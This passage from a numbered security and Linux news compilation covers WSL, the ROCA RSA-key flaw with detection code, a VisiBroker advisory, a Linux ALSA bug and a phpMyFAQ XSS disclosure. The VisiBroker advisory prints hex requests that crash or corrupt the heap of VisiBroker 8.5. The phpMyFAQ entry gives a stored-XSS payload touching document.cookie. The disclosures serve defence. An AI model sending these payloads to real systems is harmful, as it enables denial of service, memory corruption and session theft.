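    """CPUs handling more than ``factor`` times the mean packet rate: the
    single-CPU pattern that rss-ladder / autorps exist to spread out."""
    if not rate_map:
        return []
    mean = sum(r["pps"] for r in rate_map.values()) / len(rate_map)
    return sorted(c for c, r in rate_map.items() if r["pps"] > factor * mean)


# Constructed samples one second apart (not from a real host): CPU0 processes
# 1000 packets with 5 drops and 2 squeezes, CPU1 processes 100.
SAMPLE_T0 = """\
00a1f3c2 00000000 00000021 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00001234 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
"""
SAMPLE_T1 = """\
00a1f7aa 00000005 00000023 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
00001298 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
"""


def demo() -> Dict[int, Dict[str, float]]:
    """Rates between the two constructed samples."""
    return rates(parse_softnet_stat(SAMPLE_T0), parse_softnet_stat(SAMPLE_T1))


if __name__ == "__main__":
    r = demo()
    for cpu, v in r.items():
        print(cpu, v)
    print("problem CPUs:", problem_cpus(r), "hot CPUs:", hot_cpus(r))
```

On a live host, replace the constructed strings with two reads of /proc/net/softnet_stat one second apart; the file is world-readable, which is why these monitors need no root, as the README says.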
  10. Sysadmins and developers rejoice! WSL is now a fully fledged part of Windows 10, starting with the latest Fall Creators Update.

    Interested in running Linux on Windows 10 with Windows Subsystem for Linux (WSL), but nervous about it being both a beta and only available in Windows 10 developer mode? Your worries are over. In the Windows 10 Fall Creators Update (WinFCU) WSL has graduated to being a Windows 10 feature that can be run by any user.

    Tested for over a year, WSL on WinFCU is bringing many new features to this combination of the Linux Bash shell and Windows. Besides WSL no longer being a beta or requiring users to be in developer mode, the new features include:
      • Install Linux distros via the Windows Store
      • WSL now runs multiple Linux distros
      • WSL comes to Windows Server & Microsoft Azure VMs
      • WSL now supports USB/serial comms
      • Miscellaneous fixes and improvements

    Besides Ubuntu, the new WSL-supported Linux distros are SUSE's community openSUSE and its corporate SUSE Linux Enterprise Server (SLES). Fedora and other distros will arrive in the store shortly.

    If you've previously installed WSL, your existing "legacy" Ubuntu instance will continue to work, but it's deprecated. To continue to receive support you should replace it with a new store-delivered instance. Without this, you won't receive Canonical or Microsoft support. To keep your old files, you should tar them and copy them to your Windows file system; for example: `/mnt/c/temp/backups` and then copy them back to your new instance.

    In addition, instead of jumping through hoops to install Linux on Windows, you can install one or more -- yes, you can have multiple distros on a single Windows 10 system -- Linux distros from the Windows Store. To do this, you must first enable the WSL feature in the "Turn Windows Features on or off" dialog and reboot. No, WSL is not active by default and yes, you must reboot.

    After rebooting you simply search for "Linux" in the Windows Store, pick a version to install, hit install, and in a few minutes you're good to go. If you already have a Bash instance installed on WSL, you can start afresh with the lxrun /uninstall command. You run this command from the command prompt or PowerShell.

    Besides being able to install multiple Linux distributions, you can simultaneously run one or more Linux distros. Each distro runs independently of one another. These are neither virtual machines (VMs) nor containers, and that means they need their usual system resources. I, for example, would only want them on systems with at least an additional 2GB per instance of running WSL.

    WSL itself requires only minimal system resources. Rich Turner, Microsoft's senior program manager of WSL and Windows Console, wrote:

    "We don't list [RAM requirements] because, frankly, we don't have any of note! If you don't install WSL, we add no RAM footprint. If you do enable WSL, there's a tiny 850KB driver loaded briefly, and then it shuts down until you start a Linux instance. At that point, you load /init which launches /bin/bash. This causes the 850KB driver to load, and creates Pico Processes for init and bash. So, basically, WSL's RAM requirements are pretty much whatever the RAM is that you need to run each Linux binary, plus around 1MB of working set in total."

    The Linux distros can also access Windows' host filesystem, networking stack, etc. That means you should be cautious about changing files on the Windows filesystem.

    Why would you run multiple distros at once? Microsoft points out:

    You can now install Linux distros right from the Windows Store.

    Linux developers will be pleased to find that USB serial comms are now supported. This enables your shell scripts and apps to talk to serial ports. WSL also now supports mounting of USB-attached storage devices and network shares. That's the good news. The bad news is it only supports the NT filesystem IO infrastructure. In other words it only supports FAT/FAT32/NTFS formatted storage devices. Want *nix file systems? Microsoft encourages you to upvote and/or comment on the associated UserVoice ask.

    Digging deeper into the new improvements, under the hood WSL on WinFCU now includes:
      • Improved TCP socket options inc. IP_OPTIONS, IP_ADD_MEMBERSHIP, IP_MULTICAST, etc
      • /etc/hosts will now inherit entries from the Windows hosts file
      • xattr related syscalls support
      • Fixed several filesystem features and capabilities
      • Improved PTRACE support
      • Improved FUTEX support
      • chsh, which enables you to change shells, now works. This enables you to use your favorite shell directly.
      • Shell startup files other than ".bashrc" will now execute.

    The following syscalls were added for the first time during the FCU cycle:
      • prlimit64
      • getxattr, setxattr, listxattr, removexattr

    As expected, WSL is also on its way to Windows Server and to Microsoft Azure Windows VM instances. This will make WSL even more useful for sysadmins.

    All these improvements have made it even easier for developers and system administrators to run Linux shell commands on Windows. While this isn't very useful for ordinary desktop users, for serious IT staff it's a real step forward, making Windows more useful in a server and cloud world that's increasingly dominated by Linux. Even on Azure, over a third of VMs are Linux.

    With WSL, most Linux shell tools are at your command. These include: apt, ssh, find, grep, awk, sed, gpg, wget, tar, vim, emacs, diff, and patch. You can also run popular open-source programming languages such as python, perl, ruby, php, and gcc. In addition, WSL and Bash support server programs such as the Apache web-server and Oracle's MySQL database management system. In other words, you get a capable Linux development environment running on Windows.

    While you can run Linux graphical interfaces and programs on WSL, it's more of a stunt than a practical approach at this time. Of course, with a little work...

    How does WSL work? Dustin Kirkland, a member of Canonical's Ubuntu Product and Strategy executive team, explained:

    "We're talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows. [WSL] basically perform real-time translation of Linux syscalls into Windows OS syscalls. Linux geeks can think of it sort of the inverse of 'WINE' -- Ubuntu binaries running natively in Windows."

    Regardless of the technical details of how WSL does what it does, what matters now is that WSL works very, very well. Enjoy!

    Via zdnet.com
11. A newly discovered vulnerability in generation of RSA keys used by a software library adopted in cryptographic smartcards, security tokens and other secure hardware chips manufactured by Infineon Technologies AG allows for a practical factorization attack, in which the attacker computes the private part of an RSA key. The attack is feasible for commonly used key lengths, including 1024 and 2048 bits, and affects chips manufactured as early as 2012, that are now commonplace. Assess your keys now with the provided offline and online detection tools and contact your vendor if you are affected. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. Full details including the factorization method will be released in 2 weeks at the ACM CCS conference as 'The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli' (ROCA) research paper.

Description of the vulnerability

A security vulnerability was found in the implementation of RSA keypair generation in a cryptographic library used in a wide range of cryptographic chips produced by Infineon Technologies AG. The product is also integrated in authentication, signature and encryption tokens of other vendors and chips used for Trusted Boot of operating systems. The vulnerability is present in NIST FIPS 140-2 and CC EAL 5+ certified devices since at least the year 2012.

The algorithmic vulnerability is characterized by a specific structure of the generated RSA primes, which makes factorization of commonly used key lengths including 1024 and 2048 bits practically possible. Only the knowledge of a public key is necessary and no physical access to the vulnerable device is required. The vulnerability does NOT depend on a weak or a faulty random number generator - all RSA keys generated by a vulnerable chip are impacted.
The attack was practically verified for several randomly selected 1024-bit RSA keys and for several selected 2048-bit keys. The specific structure of the primes in question allows for a fast detection of vulnerable keys, even in very large datasets. This property is useful for mitigation (users can assess own keys for vulnerability), but also for potential attackers (keys vulnerable to factorization can be pre-selected, without undergoing time-consuming factorization attempts).

The worst cases for the factorization of 1024 and 2048-bit keys are less than 3 CPU-months and 100 CPU-years, respectively, on a single core of a common recent CPU, while the expected time is half of that of the worst case. The factorization can be easily parallelized on multiple CPUs. Where k CPUs are available, the wall time required for the attack will be reduced k-times - allowing for practical factorization in order of hours or days. The worst-case price of the factorization on an Amazon AWS c4 computation instance is $76 for the 1024-bit key and about $40,000 for the 2048-bit key.

The difficulty of the factorization attack is not the same for all key lengths and is NOT strictly increasing (some longer keys may take less time to factorize than other shorter ones). The following key length ranges are now considered practically factorizable (time complexity between hours to 1000 CPU years at maximum): 512 to 704 bits, 992 to 1216 bits and 1984 to 2144 bits. Note that a 4096-bit RSA key is not practically factorizable now, but may become so, if the attack is improved.

The time complexity and cost for the selected key lengths (Intel E5-2650 v3@3GHz Q2/2014):
- 512 bit RSA keys - 2 CPU hours (the cost of $0.06);
- 1024 bit RSA keys - 97 CPU days (the cost of $40-$80);
- 2048 bit RSA keys - 140.8 CPU years (the cost of $20,000 - $40,000).
The vulnerability was found by a close inspection of a large number of RSA keys generated and exported from the manufacturer smartcards by researchers at CRoCS laboratory, Masaryk University, Enigma Bridge and Ca' Foscari University. The full results will be presented at an academic ACM Conference on Computer and Communications Security (ACM CCS '17) starting from October 30th.

The vulnerability was disclosed to Infineon Technologies AG, following the responsible disclosure principle, in the first week of February with agreement of an 8 month period before a public disclosure. We cooperated with the manufacturer and other affected parties to help evaluate and mitigate this vulnerability during this period. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. We are now notifying the general public and releasing tools for assessment of the individual keys.

Impact

A remote attacker can compute an RSA private key from the value of a public key. The private key can be misused for impersonation of a legitimate owner, decryption of sensitive messages, forgery of signatures (such as for software releases) and other related attacks.

The actual impact of the vulnerability depends on the usage scenario, availability of the public keys and the lengths of keys used. We found and analyzed vulnerable keys in various domains including electronic citizen documents, authentication tokens, trusted boot devices, software package signing, TLS/HTTPS keys and PGP. The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable. The details will be presented in two weeks at the ACM CCS conference.

The vulnerable chips are pervasive and not necessarily sold directly by Infineon Technologies AG, as the chips can be embedded inside devices of other manufacturers.
Detection tools, mitigation and workarounds

The first step is to detect if you use a chip with the vulnerable library. As the vulnerability is present in the on-chip software library and not limited just to a particular batch of hardware, the only reliable way is to generate an RSA keypair on the device and test the public key by the provided tools (see below). It is recommended to test also the keys already in use. We believe the tools are very accurate - it is highly unlikely that a secure key would be flagged, as well as that a vulnerable key would be missed.

We provide the following tools:
- Offline testers: Python/Java/C++ applications and tutorials (https://github.com/crocs-muni/roca). We release all offline tools under the MIT license so they can be embedded into other testing applications and services.
- Online testers: Upload public key to https://keychest.net/roca or https://keytester.cryptosense.com to test your key.
- Email S-MIME/PGP tester: Send a signed email to roca@keychest.net to obtain an automatic email response with the analysis of the signing key vulnerability.

If a vulnerable key is found, then you should contact your device vendor for further advice. The following general advice may apply:
- Apply the software update if available.
- Replace the device with one without the vulnerable library.
- Generate a secure RSA keypair outside the device (e.g., via the OpenSSL library) and import it to the device. We are not aware of any vulnerability in connection with the actual use of the key, only the generation phase has a confirmed vulnerability.
- Use another cryptographic algorithm (e.g., ECC) instead of RSA on affected devices.
- Apply additional risk management within your environment, if the RSA key in use is detected as vulnerable.
- Use key lengths which are not currently impacted (e.g., 3936 bits) by our factorization method. Be aware: use this specific mitigation only as a last resort, as the attack may be improved.
Team

The vulnerability was discovered by Slovak and Czech security researchers from the Centre for Research on Cryptography and Security at Masaryk University, Czech Republic; Enigma Bridge Ltd, Cambridge, UK; and Ca' Foscari University of Venice, Italy.

Updates
- 2nd of November 2017 - Presentation of all details at the ACM CCS conference (to come)
- 16th of October 2017 - The initial version of the public disclosure published
- May to October 2017 - Cooperation with the manufacturer and other affected parties to help evaluate and mitigate the vulnerability
- 1st of February - The vulnerability disclosed to Infineon Technologies AG
- End of January - The vulnerability found

Technical references
- Infineon, Information on software update of RSA key generation function: https://www.infineon.com/RSA-update
- Infineon, Information on TPM firmware update for Microsoft Windows systems: https://www.infineon.com/cms/en/product/promopages/tpm-update/?redirId=59160
- Microsoft, Vulnerability in TPM could allow Security Feature Bypass: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170012
- Google, The Chromium project Trusted Platform Module firmware vulnerability: https://sites.google.com/a/chromium.org/dev/chromium-os/tpm_firmware_update

Media
- ArsTechnica: https://arstechnica.com/information-technology/2017/10/crypto-failure-cripples-millions-of-high-security-keys-750k-estonian-ids/
- Forbes: https://www.forbes.com/sites/thomasbrewster/2017/10/16/worse-than-krack-google-and-microsoft-patch-massive-5-year-old-encryption-hole/#40c81a9447c3
- Estonian ID cards: http://news.err.ee/616732/potential-security-risk-could-affect-750-000-estonian-id-cards
- The Register: https://www.theregister.co.uk/2017/10/16/roca_crypto_vuln_infineon_chips/

Paper details
Paper title: The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli [ACM CCS 2017]
Authors: Matus Nemec, Marek Sys, Petr Svenda, Dusan Klinec and Vashek Matyas
Primary contact: Petr Svenda
svenda@fi.muni.cz
Conference page: ACM CCS 2017
Download author pre-print of the paper: (to be released 2nd November)
Bibtex (regular paper):

@inproceedings{2017-ccs-nemec,
  Author = {Matus Nemec and Marek Sys and Petr Svenda and Dusan Klinec and Vashek Matyas},
  Title = {The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli},
  BookTitle = {to appear at 24th ACM Conference on Computer and Communications Security (CCS'2017)},
  Year = {2017},
  ISBN = {978-1-4503-4946-8/17/10},
  Publisher = {ACM}
}

Source
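The post says the primes have a structure that makes vulnerable keys cheap to spot but leaves the structure to the paper. As an added example, not code from the post, the CRoCS team or the roca-detect tool, this is the fingerprint those offline testers implement, as published with the paper and tool: every prime is of the form k*M + (65537^a mod M) for a primorial M, so the modulus reduced mod each small prime dividing M must lie in the subgroup generated by 65537. All function names are this example's own, and the two 512-bit moduli it checks are constructed from a fixed seed.

```python
"""Added example, not code from the post or from the roca-detect tool: the
published fingerprint behind the offline testers. Vulnerable chips produce primes
p = k*M + (65537^a mod M) with M a primorial, so N = p*q reduced modulo any
prime r dividing M lies in the subgroup of Z_r* generated by 65537; an ordinary
modulus fails that test for some r with overwhelming probability."""
import random

# Odd primes of the 512-bit M (with 2, the first 39 primes). Longer keys use a
# longer primorial that still contains these, so one residue set covers all sizes.
ODD_PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71,
              73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149,
              151, 157, 163, 167]
M = 2
for _r in ODD_PRIMES:
    M *= _r


def subgroup_residues(r):
    """Residues 65537^i mod r: the only values a vulnerable N can take mod r."""
    seen, x = set(), 1
    while x not in seen:
        seen.add(x)
        x = (x * 65537) % r
    return seen


FINGERPRINT = {r: subgroup_residues(r) for r in ODD_PRIMES}


def has_roca_fingerprint(n):
    """True if n mod r lies in <65537> for every r: the property the testers flag."""
    return all(n % r in FINGERPRINT[r] for r in ODD_PRIMES)


def is_probable_prime(n, rng, rounds=20):
    """Miller-Rabin; fine for constructing test keys, not a production primality test."""
    if n < 2 or n % 2 == 0:
        return n == 2
    for r in ODD_PRIMES:
        if n % r == 0:
            return n == r
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def weak_prime(bits, rng):
    """Constructed prime with the vulnerable structure k*M + (65537^a mod M)."""
    lo, hi = (1 << (bits - 1)) // M + 1, (1 << bits) // M
    while True:
        p = rng.randrange(lo, hi) * M + pow(65537, rng.randrange(1, M), M)
        if is_probable_prime(p, rng):
            return p


def random_prime(bits, rng):
    """Ordinary random prime of the given size, used as the non-vulnerable control."""
    while True:
        p = rng.getrandbits(bits) | (1 << (bits - 1)) | 1
        if is_probable_prime(p, rng):
            return p


def build_examples(seed=2017):
    """Return (weak_n, control_n): two constructed 512-bit moduli from a fixed seed."""
    rng = random.Random(seed)
    weak_n = weak_prime(256, rng) * weak_prime(256, rng)
    return weak_n, random_prime(256, rng) * random_prime(256, rng)
```

To check a real key, pass its modulus to has_roca_fingerprint as an int; a flagged key should be treated as the post advises, since the check says nothing about how the key is used, only how it was generated.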
12. Micro Focus VisiBroker C++ version 8.5 SP2 suffers from multiple memory corruption vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20171016-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Micro Focus VisiBroker C++
 vulnerable version: 8.5 SP2
      fixed version: 8.5 SP4 HF3
         CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283
             impact: High
           homepage: https://www.microfocus.com/products/corba/visibroker/
              found: 2017-04
                 by: W. Ettlinger (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying, and managing distributed applications. Built on open industry standards and a high-performance architecture, VisiBroker is especially suited to low-latency, complex, data-oriented, transaction-intensive, mission-critical environments. Using VisiBroker(R), organizations can develop, connect, and deploy complex distributed applications that have to meet very high performance and reliability standards. With more than 30 million licenses in use, VisiBroker is the world's most widely deployed CORBA Object Request Broker (ORB) infrastructure."

URL: https://www.microfocus.com/products/corba/visibroker/

Business recommendation:
------------------------
During a superficial fuzzing test, SEC Consult found several memory corruption vulnerabilities that allow denial of service attacks or potentially arbitrary code execution. Although the fuzzing test only had a very limited coverage, several vulnerabilities have been identified. Assuming the code quality is homogenous, it is possible that other parts of the application exhibit similar issues.
SEC Consult did not attempt to fully evaluate the potential impact of the identified vulnerabilities. SEC Consult recommends to decommission any VisiBroker C++ component that communicates with untrusted entities until a full security audit has been performed. Moreover, SEC Consult recommends to restrict network access to all CORBA services that utilize the VisiBroker C++ environment.

Vulnerability overview/description:
-----------------------------------
1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281]
By specifying a large value for a length field, an integer overflow occurs. As a result, the application reads memory until a non-mapped memory region is reached. This causes the application to encounter a segmentation fault.

2) Integer Overflow (Heap Overwrite) [CVE-2017-9282]
By specifying a manipulated value for a length field an attacker can cause an integer overflow. This causes the application to allocate too little memory. When the application attempts to write to this memory buffer, heap memory is overwritten leading to denial of service or potentially arbitrary code execution.

3) Out of Bounds Read [CVE-2017-9283]
By specifying a manipulated value for a length field, an attacker can cause the application to read past an allocated memory region.

4) Use after Free
SEC Consult found that the application under certain circumstances tries to access a memory region that has been deallocated before. It is unclear whether Micro Focus fixed the root cause of this behaviour. As the vendor was unable to reproduce the vulnerability in the current version, Micro Focus believes that the vulnerability was fixed with a previous update. Since SEC Consult is unsure whether Micro Focus found the root cause of the vulnerability, we refrain from releasing proof of concept code.
Proof of concept:
-----------------
A service implementing the following IDL was used to identify the vulnerabilities listed here:

module Bank {
    interface Account {
        float balance(in string test);
    };
    interface AccountManager {
        Account open(in string name);
    };
};

The implemented service was based on the Visibroker example project "bank_agent".

1) Integer Overflow / Out of Bounds Read (Denial of Service)
The method

CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put(
    CORBA_MarshalOutBuffer *this, const char *src, unsigned int size)

is used to copy/append a char[] into a buffer. If the size of the data that is stored in the buffer plus the size of the char[] to be appended exceeds the allocated size, the method reallocates the buffer. By choosing the size of the char[] as e.g. 0xffffffff (on 32 bit systems) an integer overflow can be caused. The method then continues without allocating additional memory. However, the application then expects that the source buffer contains 0xffffffff bytes of memory. Since this would exceed the available process memory on 32 bit systems, the application's attempt to copy data to the destination buffer fails with an out of bounds read.

The following binary request demonstrates this issue for the IDL above:

47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010
2f62616e6b5f6167656e745f706f610000ffffff42616e6b4d616e6167657200000000056f70656e
0000000000000002000000010000000c000000000001000100010109564953060000000500070801
83000000000000000000000e4a61636b20422e20517569636b00

2) Integer Overflow (Heap Overwrite)
The method

int __cdecl CORBA::string_alloc(unsigned int size)

is used to allocate buffers for strings. Since it allocates size + 1 bytes of heap memory, specifying 0xffffffff causes an integer overflow leading to the allocation of 0 bytes. This causes heap memory to be overwritten.
SEC Consult was able to use the following request to cause corruption of heap structures:

47494f5001020000000000860000000203000000000000000000002b00504d430000000400000010
2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e
0000000000000002000000010000000c000000000001000100010109564953060000000500070801
8300000000000000ffffffff4a61636b20422e20517569636b00

3) Out of Bounds Read
The constructor

int __cdecl VISServiceId::VISServiceId(
    VISServiceId *this, CORBA_MarshalInBuffer *a2, unsigned __int32 a3, unsigned __int8 *a4)

parses the GIOP key address. The VisiBroker key address consists of two strings. Before each string, a long (32 bit) value specifies the length of the string. To calculate the offset of the second string, the size of the first string is used. If this value is chosen so that the offset of the second string is outside of the GIOP message, an out of bounds read occurs.

The following binary request demonstrates this issue for the IDL above:

47494f5001020000000000860000000203000000000000000000002b00504d430000000480000000
2f62616e6b5f6167656e745f706f61000000000b42616e6b4d616e6167657200000000056f70656e
0000000000000002000000010000000c000000000001000100010109564953060000000500070801
83000000000000000000000e4a61636b20422e20517569636b00

4) Use after Free / Denial of Service
Micro Focus did not clearly state that the root cause of the vulnerability has been fixed. As a precaution we refrain from releasing proof of concept code.

Vulnerable / tested versions:
-----------------------------
At least VisiBroker C++ 8.5 SP2 has been found to be vulnerable. According to the vendor VisiBroker 8.5 prior to SP4 HF3 are vulnerable to issues #1 - #3.
Vendor contact timeline:
------------------------
2017-05-03: Contacting vendor through security@microfocus.com, attaching encrypted security advisory
2017-05-03: Vendor: will inform us about the timeframe once the findings have been reproduced
2017-05-26: Vendor: were able to reproduce first 3 issues; requested further information for vulnerability #4
2017-05-30: Providing further information for vulnerability #4
2017-06-21: Requesting status update
2017-06-28: Vendor: First three issues have been fixed by the development team, "They have reproduced the fourth and are working on it now."
2017-06-30: Vendor: Patch will be available in a few weeks
2017-07-28: Requesting status update
2017-08-02: Vendor: There is no fixed release date for the patch yet
2017-08-28: Vendor: Initial test run found an issue that has been fixed
2017-09-15: Requesting status update
2017-09-15: Vendor: "The patches were just released on the 12th and 13th"
2017-09-18: Asking for further information about CVEs, affected versions
2017-09-21: Vendor: Issue #4 has not been fixed since the team was unable to reproduce it (the vendor stated that the issue has been reproduced, see 2017-06-26). "They [the team] believe it was already fixed by an earlier modification."
2017-09-27: Requesting clarification for issue #4
2017-09-27: Vendor: The team initially thought they had reproduced the issue; this was an unrelated issue that was fixed as well.
2017-10-16: Public release of the advisory

Solution:
---------
Upgrade to version 8.5 Service Pack 4 Hotfix 3.
The release notes with information on how to obtain this hotfix can be obtained here:
https://community.microfocus.com/microfocus/corba/visibroker_-_world_class_middleware/w/knowledge_base/29171/visibroker-8-5-service-pack-4-hotfix-3-security-fixes

Workaround:
-----------
None

Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult? Send us your application
https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices
https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Ettlinger / @2017

Source
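Issue #3 comes from trusting the first length field when computing where the second string starts. As an added example that is not VisiBroker's code, this is a bounds-checked reader for the key address as the advisory describes it (two strings, each preceded by a 32-bit length); big-endian byte order and the exact surrounding GIOP layout are assumptions, the sample messages are constructed, and the function names are this example's own.

```python
"""Added example, not VisiBroker code: a bounds-checked reader for the key
address as the advisory describes it (two strings, each preceded by a 32-bit
length). Big-endian byte order and the exact surrounding GIOP layout are
assumptions, and the sample messages are constructed here."""
import struct


class MalformedKeyAddress(ValueError):
    """Raised instead of reading outside the message."""


def read_string(buf, off):
    """Read one 32-bit length and that many bytes starting at off.

    The length is compared against the bytes remaining, never against
    off + length, so a value such as 0x80000000 (the first length in the
    issue #3 request) cannot wrap a narrower integer or move the cursor
    past the end of the message.
    """
    if off < 0 or len(buf) - off < 4:
        raise MalformedKeyAddress("length field at offset %d is outside the message" % off)
    (length,) = struct.unpack_from(">I", buf, off)
    off += 4
    if length > len(buf) - off:
        raise MalformedKeyAddress("string length %#x exceeds the %d remaining bytes"
                                  % (length, len(buf) - off))
    return buf[off:off + length], off + length


def parse_key_address(buf, off=0):
    """Return the two strings of the key address, validating each length field."""
    first, off = read_string(buf, off)
    second, _ = read_string(buf, off)
    return first, second


def encode_key_address(first, second):
    """Constructed encoder, used only to build sample input for this example."""
    return b"".join(struct.pack(">I", len(s)) + s for s in (first, second))


def is_well_formed(buf):
    """True if the key address parses inside the message, False if it is rejected."""
    try:
        parse_key_address(buf)
        return True
    except MalformedKeyAddress:
        return False


# Constructed samples: a sane key address, and the same bytes with the first
# length replaced by 0x80000000 so the second string's offset leaves the message.
GOOD = encode_key_address(b"/bank_agent_poa", b"BankManager")
BAD = struct.pack(">I", 0x80000000) + GOOD[4:]
```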
13. Security researchers have discovered a new privilege-escalation vulnerability in Linux kernel that could allow a local attacker to execute code on the affected systems with elevated privileges.

Discovered by Venustech ADLab (Active-Defense Lab) researchers, the Linux kernel vulnerability (CVE-2017-15265) is due to a use-after-free memory error in the Advanced Linux Sound Architecture (ALSA) sequencer interface of the affected application.

The Advanced Linux Sound Architecture (ALSA) provides audio and MIDI functionality to the Linux operating system, and also bundles a userspace driven library for application developers, enabling direct (kernel) interaction with sound devices through ALSA libraries.

Successful exploitation of this vulnerability requires an attacker—with local access on the targeted system—to execute a maliciously crafted application on a targeted system, which allows the attacker to elevate his privilege to root on the targeted system, a Cisco advisory warned.

The vulnerability affects major distributions of the Linux operating system including RedHat, Debian, Ubuntu, and Suse, and is triggered by a slip in snd_seq_create_port(). The vulnerability has been patched in Linux kernel version 4.13.4-2, which was fixed just by taking the refcount properly at "snd_seq_create_port()" and letting the caller unref the object after use.

Administrators are advised to apply the appropriate updates on their Linux distributions as soon as they receive them from their respective distro. They're also recommended to allow only trusted users to access local systems and always monitor affected systems.

This flaw is yet another privilege escalation vulnerability recently uncovered in the Linux kernel. Last month, a high-risk 2-year-old potential local privilege escalation flaw was patched in the Linux kernel that affected all major Linux distributions, including Red Hat, Debian, and CentOS.
In February, another privilege-escalation vulnerability that dates back to 2011 was disclosed and patched in the Linux kernel, which also affected major Linux distros, including Redhat, Debian, OpenSUSE, and Ubuntu.

Via thehackernews.com
14.
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14619

1. Description

Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the "Title of your FAQ" field in the Configuration Module.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14619

2. Proof of Concept

Steps to Reproduce:
1. Open the affected link http://localhost/phpmyfaq/admin/?action=config with a logged in user with administrator privileges
2. Enter <marquee onscroll=alert(document.cookie)> in the "Title of your FAQ" field
3. Save the Configuration
4. Login using any other user or simply click on the phpMyFAQ on the top-right hand side of the web portal

3. Solution:

The Vulnerability will be fixed in the next release of phpMyFAQ

# 0day.today [2017-10-13] #
Source: 0day.today